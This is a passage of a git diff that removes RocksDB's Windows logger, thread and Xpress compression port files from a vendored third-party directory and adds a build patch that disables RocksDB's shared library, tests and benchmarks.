-#include <time.h>
-#include <fcntl.h>
-#include <atomic>
-
-#include "rocksdb/env.h"
-
-#include "monitoring/iostats_context_imp.h"
-#include "port/sys_time.h"
-
-namespace rocksdb {
-
-namespace port {
-
-WinLogger::WinLogger(uint64_t (*gettid)(), Env* env, HANDLE file,
-                     const InfoLogLevel log_level)
-    : Logger(log_level),
-      file_(file),
-      gettid_(gettid),
-      log_size_(0),
-      last_flush_micros_(0),
-      env_(env),
-      flush_pending_(false) {}
-
-void WinLogger::DebugWriter(const char* str, int len) {
-  DWORD bytesWritten = 0;
-  BOOL ret = WriteFile(file_, str, len, &bytesWritten, NULL);
-  if (ret == FALSE) {
-    std::string errSz = GetWindowsErrSz(GetLastError());
-    fprintf(stderr, errSz.c_str());
-  }
-}
-
-WinLogger::~WinLogger() { close(); }
-
-void WinLogger::close() { CloseHandle(file_); }
-
-void WinLogger::Flush() {
-  if (flush_pending_) {
-    flush_pending_ = false;
-    // With Windows API writes go to OS buffers directly so no fflush needed
-    // unlike with C runtime API. We don't flush all the way to disk
-    // for perf reasons.
-  }
-
-  last_flush_micros_ = env_->NowMicros();
-}
-
-void WinLogger::Logv(const char* format, va_list ap) {
-  IOSTATS_TIMER_GUARD(logger_nanos);
-
-  const uint64_t thread_id = (*gettid_)();
-
-  // We try twice: the first time with a fixed-size stack allocated buffer,
-  // and the second time with a much larger dynamically allocated buffer.
-  char buffer[500];
-  std::unique_ptr<char[]> largeBuffer;
-  for (int iter = 0; iter < 2; ++iter) {
-    char* base;
-    int bufsize;
-    if (iter == 0) {
-      bufsize = sizeof(buffer);
-      base = buffer;
-    } else {
-      bufsize = 30000;
-      largeBuffer.reset(new char[bufsize]);
-      base = largeBuffer.get();
-    }
-
-    char* p = base;
-    char* limit = base + bufsize;
-
-    struct timeval now_tv;
-    gettimeofday(&now_tv, nullptr);
-    const time_t seconds = now_tv.tv_sec;
-    struct tm t;
-    localtime_s(&t, &seconds);
-    p += snprintf(p, limit - p, "%04d/%02d/%02d-%02d:%02d:%02d.%06d %llx ",
-                  t.tm_year + 1900, t.tm_mon + 1, t.tm_mday, t.tm_hour,
-                  t.tm_min, t.tm_sec, static_cast<int>(now_tv.tv_usec),
-                  static_cast<long long unsigned int>(thread_id));
-
-    // Print the message
-    if (p < limit) {
-      va_list backup_ap;
-      va_copy(backup_ap, ap);
-      int done = vsnprintf(p, limit - p, format, backup_ap);
-      if (done > 0) {
-        p += done;
-      } else {
-        continue;
-      }
-      va_end(backup_ap);
-    }
-
-    // Truncate to available space if necessary
-    if (p >= limit) {
-      if (iter == 0) {
-        continue;  // Try again with larger buffer
-      } else {
-        p = limit - 1;
-      }
-    }
-
-    // Add newline if necessary
-    if (p == base || p[-1] != '\n') {
-      *p++ = '\n';
-    }
-
-    assert(p <= limit);
-    const size_t write_size = p - base;
-
-    DWORD bytesWritten = 0;
-    BOOL ret = WriteFile(file_, base, static_cast<DWORD>(write_size),
-      &bytesWritten, NULL);
-    if (ret == FALSE) {
-      std::string errSz = GetWindowsErrSz(GetLastError());
-      fprintf(stderr, errSz.c_str());
-    }
-
-    flush_pending_ = true;
-    assert((bytesWritten == write_size) || (ret == FALSE));
-    if (bytesWritten > 0) {
-      log_size_ += write_size;
-    }
-
-    uint64_t now_micros =
-        static_cast<uint64_t>(now_tv.tv_sec) * 1000000 + now_tv.tv_usec;
-    if (now_micros - last_flush_micros_ >= flush_every_seconds_ * 1000000) {
-      flush_pending_ = false;
-      // With Windows API writes go to OS buffers directly so no fflush needed
-      // unlike with C runtime API. We don't flush all the way to disk
-      // for perf reasons.
-      last_flush_micros_ = now_micros;
-    }
-    break;
-  }
-}
-
-size_t WinLogger::GetLogFileSize() const { return log_size_; }
-
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/win_logger.h b/thirdparty/rocksdb/port/win/win_logger.h
deleted file mode 100644
index 2d44f50..0000000
--- a/thirdparty/rocksdb/port/win/win_logger.h
+++ /dev/null
@@ -1,63 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Logger implementation that can be shared by all environments
-// where enough posix functionality is available.
-
-#pragma once
-
-#include <atomic>
-
-#include "rocksdb/env.h"
-
-#include <stdint.h>
-#include <windows.h>
-
-namespace rocksdb {
-
-class Env;
-
-namespace port {
-
-class WinLogger : public rocksdb::Logger {
- public:
-  WinLogger(uint64_t (*gettid)(), Env* env, HANDLE file,
-            const InfoLogLevel log_level = InfoLogLevel::ERROR_LEVEL);
-
-  virtual ~WinLogger();
-
-  WinLogger(const WinLogger&) = delete;
-
-  WinLogger& operator=(const WinLogger&) = delete;
-
-  void close();
-
-  void Flush() override;
-
-  using rocksdb::Logger::Logv;
-  void Logv(const char* format, va_list ap) override;
-
-  size_t GetLogFileSize() const override;
-
-  void DebugWriter(const char* str, int len);
-
- private:
-  HANDLE file_;
-  uint64_t (*gettid_)();  // Return the thread id for the current thread
-  std::atomic_size_t log_size_;
-  std::atomic_uint_fast64_t last_flush_micros_;
-  Env* env_;
-  bool flush_pending_;
-
-  const static uint64_t flush_every_seconds_ = 5;
-};
-
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/win_thread.cc b/thirdparty/rocksdb/port/win/win_thread.cc
deleted file mode 100644
index e55ca74..0000000
--- a/thirdparty/rocksdb/port/win/win_thread.cc
+++ /dev/null
@@ -1,166 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/win/win_thread.h"
-
-#include <assert.h>
-#include <process.h> // __beginthreadex
-#include <windows.h>
-
-#include <stdexcept>
-#include <system_error>
-#include <thread>
-
-namespace rocksdb {
-namespace port {
-
-struct WindowsThread::Data {
-
-  std::function<void()> func_;
-  uintptr_t             handle_;
-
-  Data(std::function<void()>&& func) :
-    func_(std::move(func)),
-    handle_(0) {
-  }
-
-  Data(const Data&) = delete;
-  Data& operator=(const Data&) = delete;
-
-  static unsigned int __stdcall ThreadProc(void* arg);
-};
-
-
-void WindowsThread::Init(std::function<void()>&& func) {
-
-  data_.reset(new Data(std::move(func)));
-
-  data_->handle_ = _beginthreadex(NULL,
-    0,    // stack size
-    &Data::ThreadProc,
-    data_.get(),
-    0,   // init flag
-    &th_id_);
-
-  if (data_->handle_ == 0) {
-    throw std::system_error(std::make_error_code(
-      std::errc::resource_unavailable_try_again),
-      "Unable to create a thread");
-  }
-}
-
-WindowsThread::WindowsThread() :
-  data_(nullptr),
-  th_id_(0)
-{}
-
-
-WindowsThread::~WindowsThread() {
-  // Must be joined or detached
-  // before destruction.
-  // This is the same as std::thread
-  if (data_) {
-    if (joinable()) {
-      assert(false);
-      std::terminate();
-    }
-    data_.reset();
-  }
-}
-
-WindowsThread::WindowsThread(WindowsThread&& o) noexcept :
-  WindowsThread() {
-  *this = std::move(o);
-}
-
-WindowsThread& WindowsThread::operator=(WindowsThread&& o) noexcept {
-
-  if (joinable()) {
-    assert(false);
-    std::terminate();
-  }
-
-  data_ = std::move(o.data_);
-
-  // Per spec both instances will have the same id
-  th_id_ = o.th_id_;
-
-  return *this;
-}
-
-bool WindowsThread::joinable() const {
-  return (data_ && data_->handle_ != 0);
-}
-
-WindowsThread::native_handle_type WindowsThread::native_handle() const {
-  return reinterpret_cast<native_handle_type>(data_->handle_);
-}
-
-unsigned WindowsThread::hardware_concurrency() {
-  return std::thread::hardware_concurrency();
-}
-
-void WindowsThread::join() {
-
-  if (!joinable()) {
-    assert(false);
-    throw std::system_error(
-      std::make_error_code(std::errc::invalid_argument),
-      "Thread is no longer joinable");
-  }
-
-  if (GetThreadId(GetCurrentThread()) == th_id_) {
-    assert(false);
-    throw std::system_error(
-      std::make_error_code(std::errc::resource_deadlock_would_occur),
-      "Can not join itself");
-  }
-
-  auto ret = WaitForSingleObject(reinterpret_cast<HANDLE>(data_->handle_),
-    INFINITE);
-  if (ret != WAIT_OBJECT_0) {
-    auto lastError = GetLastError();
-    assert(false);
-    throw std::system_error(static_cast<int>(lastError),
-      std::system_category(),
-      "WaitForSingleObjectFailed");
-  }
-
-  CloseHandle(reinterpret_cast<HANDLE>(data_->handle_));
-  data_->handle_ = 0;
-}
-
-bool WindowsThread::detach() {
-
-  if (!joinable()) {
-    assert(false);
-    throw std::system_error(
-      std::make_error_code(std::errc::invalid_argument),
-      "Thread is no longer available");
-  }
-
-  BOOL ret = CloseHandle(reinterpret_cast<HANDLE>(data_->handle_));
-  data_->handle_ = 0;
-
-  return (ret == TRUE);
-}
-
-void  WindowsThread::swap(WindowsThread& o) {
-  data_.swap(o.data_);
-  std::swap(th_id_, o.th_id_);
-}
-
-unsigned int __stdcall  WindowsThread::Data::ThreadProc(void* arg) {
-  auto data = reinterpret_cast<WindowsThread::Data*>(arg);
-  data->func_();
-  _endthreadex(0);
-  return 0;
-}
-} // namespace port
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/win_thread.h b/thirdparty/rocksdb/port/win/win_thread.h
deleted file mode 100644
index 993cc02..0000000
--- a/thirdparty/rocksdb/port/win/win_thread.h
+++ /dev/null
@@ -1,121 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-#include <functional>
-#include <type_traits>
-
-namespace rocksdb {
-namespace port {
-
-// This class is a replacement for std::thread
-// 2 reasons we do not like std::thread:
-//  -- is that it dynamically allocates its internals that are automatically
-//     freed when  the thread terminates and not on the destruction of the
-//     object. This makes it difficult to control the source of memory
-//     allocation 
-//  -  This implements Pimpl so we can easily replace the guts of the
-//      object in our private version if necessary.
-class WindowsThread {
-
-  struct Data;
-
-  std::unique_ptr<Data>  data_;
-  unsigned int           th_id_;
-
-  void Init(std::function<void()>&&);
-
-public:
-
-  typedef void* native_handle_type;
-
-  // Construct with no thread
-  WindowsThread();
-
-  // Template constructor
-  // 
-  // This templated constructor accomplishes several things
-  //
-  // - Allows the class as whole to be not a template
-  //
-  // - take "universal" references to support both _lvalues and _rvalues
-  //
-  // -  because this constructor is a catchall case in many respects it
-  //    may prevent us from using both the default __ctor, the move __ctor.
-  //    Also it may circumvent copy __ctor deletion. To work around this
-  //    we make sure this one has at least one argument and eliminate
-  //    it from the overload  selection when WindowsThread is the first
-  //    argument.
-  //
-  // - construct with Fx(Ax...) with a variable number of types/arguments.
-  //
-  // - Gathers together the callable object with its arguments and constructs
-  //   a single callable entity
-  //
-  // - Makes use of std::function to convert it to a specification-template
-  //   dependent type that both checks the signature conformance to ensure
-  //   that all of the necessary arguments are provided and allows pimpl
-  //   implementation.
-  template<class Fn,
-    class... Args,
-    class = typename std::enable_if<
-      !std::is_same<typename std::decay<Fn>::type,
-                    WindowsThread>::value>::type>
-  explicit WindowsThread(Fn&& fx, Args&&... ax) :
-      WindowsThread() {
-
-    // Use binder to create a single callable entity
-    auto binder = std::bind(std::forward<Fn>(fx),
-      std::forward<Args>(ax)...);
-    // Use std::function to take advantage of the type erasure
-    // so we can still hide implementation within pimpl
-    // This also makes sure that the binder signature is compliant
-    std::function<void()> target = binder;
-
-    Init(std::move(target));
-  }
-
-
-  ~WindowsThread();
-
-  WindowsThread(const WindowsThread&) = delete;
-
-  WindowsThread& operator=(const WindowsThread&) = delete;
-
-  WindowsThread(WindowsThread&&) noexcept;
-
-  WindowsThread& operator=(WindowsThread&&) noexcept;
-
-  bool joinable() const;
-
-  unsigned int get_id() const { return th_id_; }
-
-  native_handle_type native_handle() const;
-
-  static unsigned hardware_concurrency();
-
-  void join();
-
-  bool detach();
-
-  void swap(WindowsThread&);
-};
-} // namespace port
-} // namespace rocksdb
-
-namespace std {
-  inline
-  void swap(rocksdb::port::WindowsThread& th1, 
-    rocksdb::port::WindowsThread& th2) {
-    th1.swap(th2);
-  }
-} // namespace std
-
diff --git a/thirdparty/rocksdb/port/win/xpress_win.cc b/thirdparty/rocksdb/port/win/xpress_win.cc
deleted file mode 100644
index 9ab23c5..0000000
--- a/thirdparty/rocksdb/port/win/xpress_win.cc
+++ /dev/null
@@ -1,226 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/win/xpress_win.h"
-#include <windows.h>
-
-#include <cassert>
-#include <memory>
-#include <limits>
-#include <iostream>
-
-#ifdef XPRESS
-
-// Put this under ifdef so windows systems w/o this
-// can still build
-#include <compressapi.h>
-
-namespace rocksdb {
-namespace port {
-namespace xpress {
-
-// Helpers
-namespace {
-
-auto CloseCompressorFun = [](void* h) {
-  if (NULL != h) {
-    ::CloseCompressor(reinterpret_cast<COMPRESSOR_HANDLE>(h));
-  }
-};
-
-auto CloseDecompressorFun = [](void* h) {
-  if (NULL != h) {
-    ::CloseDecompressor(reinterpret_cast<DECOMPRESSOR_HANDLE>(h));
-  }
-};
-}
-
-bool Compress(const char* input, size_t length, std::string* output) {
-
-  assert(input != nullptr);
-  assert(output != nullptr);
-
-  if (length == 0) {
-    output->clear();
-    return true;
-  }
-
-  COMPRESS_ALLOCATION_ROUTINES* allocRoutinesPtr = nullptr;
-
-  COMPRESSOR_HANDLE compressor = NULL;
-
-  BOOL success = CreateCompressor(
-    COMPRESS_ALGORITHM_XPRESS, //  Compression Algorithm
-    allocRoutinesPtr,       //  Optional allocation routine
-    &compressor);              //  Handle
-
-  if (!success) {
-#ifdef _DEBUG
-    std::cerr << "XPRESS: Failed to create Compressor LastError: " <<
-      GetLastError() << std::endl;
-#endif
-    return false;
-  }
-
-  std::unique_ptr<void, decltype(CloseCompressorFun)>
-    compressorGuard(compressor, CloseCompressorFun);
-
-  SIZE_T compressedBufferSize = 0;
-
-  //  Query compressed buffer size.
-  success = ::Compress(
-    compressor,                 //  Compressor Handle
-    const_cast<char*>(input),   //  Input buffer
-    length,                     //  Uncompressed data size
-    NULL,                       //  Compressed Buffer
-    0,                          //  Compressed Buffer size
-    &compressedBufferSize);     //  Compressed Data size
-
-  if (!success) {
-
-    auto lastError = GetLastError();
-
-    if (lastError != ERROR_INSUFFICIENT_BUFFER) {
-#ifdef _DEBUG
-      std::cerr <<
-        "XPRESS: Failed to estimate compressed buffer size LastError " <<
-        lastError << std::endl;
-#endif
-      return false;
-    }
-  }
-
-  assert(compressedBufferSize > 0);
-
-  std::string result;
-  result.resize(compressedBufferSize);
-
-  SIZE_T compressedDataSize = 0;
-
-  //  Compress
-  success = ::Compress(
-    compressor,                  //  Compressor Handle
-    const_cast<char*>(input),    //  Input buffer
-    length,                      //  Uncompressed data size
-    &result[0],                  //  Compressed Buffer
-    compressedBufferSize,        //  Compressed Buffer size
-    &compressedDataSize);        //  Compressed Data size
-
-  if (!success) {
-#ifdef _DEBUG
-    std::cerr << "XPRESS: Failed to compress LastError " <<
-      GetLastError() << std::endl;
-#endif
-    return false;
-  }
-
-  result.resize(compressedDataSize);
-  output->swap(result);
-
-  return true;
-}
-
-char* Decompress(const char* input_data, size_t input_length,
-  int* decompress_size) {
-
-  assert(input_data != nullptr);
-  assert(decompress_size != nullptr);
-
-  if (input_length == 0) {
-    return nullptr;
-  }
-
-  COMPRESS_ALLOCATION_ROUTINES* allocRoutinesPtr = nullptr;
-
-  DECOMPRESSOR_HANDLE decompressor = NULL;
-
-  BOOL success = CreateDecompressor(
-    COMPRESS_ALGORITHM_XPRESS, //  Compression Algorithm
-    allocRoutinesPtr,          //  Optional allocation routine
-    &decompressor);            //  Handle
-
-
-  if (!success) {
-#ifdef _DEBUG
-    std::cerr << "XPRESS: Failed to create Decompressor LastError "
-      << GetLastError() << std::endl;
-#endif
-    return nullptr;
-  }
-
-  std::unique_ptr<void, decltype(CloseDecompressorFun)>
-    compressorGuard(decompressor, CloseDecompressorFun);
-
-  SIZE_T decompressedBufferSize = 0;
-
-  success = ::Decompress(
-    decompressor,          //  Compressor Handle
-    const_cast<char*>(input_data),  //  Compressed data
-    input_length,               //  Compressed data size
-    NULL,                        //  Buffer set to NULL
-    0,                           //  Buffer size set to 0
-    &decompressedBufferSize);    //  Decompressed Data size
-
-  if (!success) {
-
-    auto lastError = GetLastError();
-
-    if (lastError != ERROR_INSUFFICIENT_BUFFER) {
-#ifdef _DEBUG
-      std::cerr
-        << "XPRESS: Failed to estimate decompressed buffer size LastError "
-        << lastError << std::endl;
-#endif
-      return nullptr;
-    }
-  }
-
-  assert(decompressedBufferSize > 0);
-
-  // On Windows we are limited to a 32-bit int for the
-  // output data size argument
-  // so we hopefully never get here
-  if (decompressedBufferSize > std::numeric_limits<int>::max()) {
-    assert(false);
-    return nullptr;
-  }
-
-  // The callers are deallocating using delete[]
-  // thus we must allocate with new[]
-  std::unique_ptr<char[]> outputBuffer(new char[decompressedBufferSize]);
-
-  SIZE_T decompressedDataSize = 0;
-
-  success = ::Decompress(
-    decompressor,
-    const_cast<char*>(input_data),
-    input_length,
-    outputBuffer.get(),
-    decompressedBufferSize,
-    &decompressedDataSize);
-
-  if (!success) {
-#ifdef _DEBUG
-    std::cerr <<
-      "XPRESS: Failed to decompress LastError " <<
-      GetLastError() << std::endl;
-#endif
-    return nullptr;
-  }
-
-  *decompress_size = static_cast<int>(decompressedDataSize);
-
-  // Return the raw buffer to the caller supporting the tradition
-  return outputBuffer.release();
-}
-}
-}
-}
-
-#endif
diff --git a/thirdparty/rocksdb/port/win/xpress_win.h b/thirdparty/rocksdb/port/win/xpress_win.h
deleted file mode 100644
index 5b11e7d..0000000
--- a/thirdparty/rocksdb/port/win/xpress_win.h
+++ /dev/null
@@ -1,26 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <string>
-
-namespace rocksdb {
-namespace port {
-namespace xpress {
-
-bool Compress(const char* input, size_t length, std::string* output);
-
-char* Decompress(const char* input_data, size_t input_length,
-                 int* decompress_size);
-
-}
-}
-}
-
diff --git a/thirdparty/rocksdb/port/xpress.h b/thirdparty/rocksdb/port/xpress.h
deleted file mode 100644
index 457025f..0000000
--- a/thirdparty/rocksdb/port/xpress.h
+++ /dev/null
@@ -1,17 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-// Xpress on Windows is implemeted using Win API
-#if defined(ROCKSDB_PLATFORM_POSIX)
-#error "Xpress compression not implemented"
-#elif defined(OS_WIN)
-#include "port/win/xpress_win.h"
-#endif
diff --git a/thirdparty/rocksdb/rocksdb-BUILD.patch b/thirdparty/rocksdb/rocksdb-BUILD.patch
new file mode 100644
index 0000000..c755944
--- /dev/null
+++ b/thirdparty/rocksdb/rocksdb-BUILD.patch
@@ -0,0 +1,458 @@
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 45bb105a2..a77bdb8bb 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -348,10 +348,8 @@ endif()
+ 
+ include_directories(${PROJECT_SOURCE_DIR})
+ include_directories(${PROJECT_SOURCE_DIR}/include)
+-include_directories(SYSTEM ${PROJECT_SOURCE_DIR}/third-party/gtest-1.7.0/fused-src)
+ find_package(Threads REQUIRED)
+ 
+-add_subdirectory(third-party/gtest-1.7.0/fused-src/gtest)
+ 
+ # Main library source code
+ 
+@@ -502,10 +500,8 @@ set(SOURCES
+         util/status_message.cc
+         util/string_util.cc
+         util/sync_point.cc
+-        util/testutil.cc
+         util/thread_local.cc
+         util/threadpool_imp.cc
+-        util/transaction_test_util.cc
+         util/xxhash.cc
+         utilities/backupable/backupable_db.cc
+         utilities/blob_db/blob_db.cc
+@@ -574,12 +570,12 @@ if(WIN32)
+     port/win/win_logger.cc
+     port/win/win_thread.cc
+     port/win/xpress_win.cc)
+-	
++
+ if(WITH_JEMALLOC)
+   list(APPEND SOURCES
+     port/win/win_jemalloc.cc)
+ endif()
+-	
++
+ else()
+   list(APPEND SOURCES
+     port/port_posix.cc
+@@ -588,24 +584,28 @@ else()
+ endif()
+ 
+ set(ROCKSDB_STATIC_LIB rocksdb${ARTIFACT_SUFFIX})
+-set(ROCKSDB_SHARED_LIB rocksdb-shared${ARTIFACT_SUFFIX})
++# commented out to avoid building the shared lib
++#set(ROCKSDB_SHARED_LIB rocksdb-shared${ARTIFACT_SUFFIX})
+ set(ROCKSDB_IMPORT_LIB ${ROCKSDB_SHARED_LIB})
+ if(WIN32)
+-  set(SYSTEM_LIBS ${SYSTEM_LIBS} Shlwapi.lib Rpcrt4.lib)
++  #set(SYSTEM_LIBS ${SYSTEM_LIBS} shlwapi.lib Rpcrt4.lib)
++  set(SYSTEM_LIBS ${SYSTEM_LIBS}  Rpcrt4.lib)
+   set(LIBS ${ROCKSDB_STATIC_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+ else()
+   set(SYSTEM_LIBS ${CMAKE_THREAD_LIBS_INIT})
+-  set(LIBS ${ROCKSDB_SHARED_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+-
+-  add_library(${ROCKSDB_SHARED_LIB} SHARED ${SOURCES})
+-  target_link_libraries(${ROCKSDB_SHARED_LIB}
+-    ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+-  set_target_properties(${ROCKSDB_SHARED_LIB} PROPERTIES
+-                        LINKER_LANGUAGE CXX
+-                        VERSION ${ROCKSDB_VERSION}
+-                        SOVERSION ${ROCKSDB_VERSION_MAJOR}
+-                        CXX_STANDARD 11
+-                        OUTPUT_NAME "rocksdb")
++  set(LIBS ${ROCKSDB_STATIC_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
++# commented out to avoid building the shared lib
++# as there is no reason
++#add_library(${ROCKSDB_SHARED_LIB} SHARED ${SOURCES})
++
++# target_link_libraries(${ROCKSDB_SHARED_LIB}
++#    ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
++#  set_target_properties(${ROCKSDB_SHARED_LIB} PROPERTIES
++#                        LINKER_LANGUAGE CXX
++#                        VERSION ${ROCKSDB_VERSION}
++#                        SOVERSION ${ROCKSDB_VERSION_MAJOR}
++#                        CXX_STANDARD 11
++#                        OUTPUT_NAME "rocksdb")
+ endif()
+ 
+ option(WITH_LIBRADOS "Build with librados" OFF)
+@@ -620,16 +620,15 @@ target_link_libraries(${ROCKSDB_STATIC_LIB}
+   ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+ 
+ if(WIN32)
+-  add_library(${ROCKSDB_IMPORT_LIB} SHARED ${SOURCES})
+-  target_link_libraries(${ROCKSDB_IMPORT_LIB}
+-    ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+-  set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
+-    COMPILE_DEFINITIONS "ROCKSDB_DLL;ROCKSDB_LIBRARY_EXPORTS")
++#  add_library(${ROCKSDB_IMPORT_LIB} SHARED ${SOURCES})
++  #target_link_libraries(${ROCKSDB_IMPORT_LIB}  ${SYSTEM_LIBS})
++  #set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
++   # COMPILE_DEFINITIONS "ROCKSDB_DLL;ROCKSDB_LIBRARY_EXPORTS")
+   if(MSVC)
+     set_target_properties(${ROCKSDB_STATIC_LIB} PROPERTIES
+       COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_STATIC_LIB}.pdb")
+-    set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
+-      COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_IMPORT_LIB}.pdb")
++    #set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
++      #COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_IMPORT_LIB}.pdb")
+   endif()
+ endif()
+ 
+@@ -663,11 +662,11 @@ if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS)
+     INSTALL_DESTINATION ${package_config_destination}
+   )
+ 
+-  write_basic_package_version_file(
+-    RocksDBConfigVersion.cmake
+-    VERSION ${ROCKSDB_VERSION}
+-    COMPATIBILITY SameMajorVersion
+-  )
++#  write_basic_package_version_file(
++#    RocksDBConfigVersion.cmake
++#    VERSION ${ROCKSDB_VERSION}
++#    COMPATIBILITY SameMajorVersion
++#  )
+ 
+   install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}")
+ 
+@@ -695,13 +694,13 @@ if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS)
+     NAMESPACE RocksDB::
+   )
+ 
+-  install(
+-    FILES
+-    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfig.cmake
+-    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfigVersion.cmake
+-    COMPONENT devel
+-    DESTINATION ${package_config_destination}
+-  )
++#  install(
++#    FILES
++#    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfig.cmake
++#    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfigVersion.cmake
++#    COMPONENT devel
++#    DESTINATION ${package_config_destination}
++#  )
+ endif()
+ 
+ option(WITH_TESTS "build with tests" ON)
+@@ -806,7 +805,6 @@ if(WITH_TESTS)
+         util/file_reader_writer_test.cc
+         util/filelock_test.cc
+         util/hash_test.cc
+-        util/heap_test.cc
+         util/rate_limiter_test.cc
+         util/slice_transform_test.cc
+         util/timer_queue_test.cc
+@@ -845,20 +843,6 @@ if(WITH_TESTS)
+     list(APPEND TESTS utilities/env_librados_test.cc)
+   endif()
+ 
+-  set(BENCHMARKS
+-    cache/cache_bench.cc
+-    memtable/memtablerep_bench.cc
+-    tools/db_bench.cc
+-    table/table_reader_bench.cc
+-    utilities/column_aware_encoding_exp.cc
+-    utilities/persistent_cache/hash_table_bench.cc)
+-  add_library(testharness OBJECT util/testharness.cc)
+-  foreach(sourcefile ${BENCHMARKS})
+-    get_filename_component(exename ${sourcefile} NAME_WE)
+-    add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
+-      $<TARGET_OBJECTS:testharness>)
+-    target_link_libraries(${exename}${ARTIFACT_SUFFIX} gtest ${LIBS})
+-  endforeach(sourcefile ${BENCHMARKS})
+ 
+   # For test util library that is build only in DEBUG mode
+   # and linked to tests. Add test only code that is not #ifdefed for Release here.
+@@ -884,23 +868,25 @@ if(WITH_TESTS)
+         )
+ 
+   # Tests are excluded from Release builds
+-  set(TEST_EXES ${TESTS})
+-
+-  foreach(sourcefile ${TEST_EXES})
+-      get_filename_component(exename ${sourcefile} NAME_WE)
+-      add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
+-        $<TARGET_OBJECTS:testharness>)
+-      set_target_properties(${exename}${ARTIFACT_SUFFIX}
+-        PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
+-        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
+-        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
+-        )
+-      target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS})
+-      if(NOT "${exename}" MATCHES "db_sanity_test")
+-        add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
+-        add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
+-      endif()
+-  endforeach(sourcefile ${TEST_EXES})
++  #set(TEST_EXES ${TESTS})
++
++  # while tests are not built, we want to ensure that any reference to gtest is removed in case the user
++  # builds rocksdb manually from our third party directory
++  #foreach(sourcefile ${TEST_EXES})
++  #    get_filename_component(exename ${sourcefile} NAME_WE)
++  #    add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
++  #      $<TARGET_OBJECTS:testharness>)
++  #    set_target_properties(${exename}${ARTIFACT_SUFFIX}
++  #      PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
++  #      EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
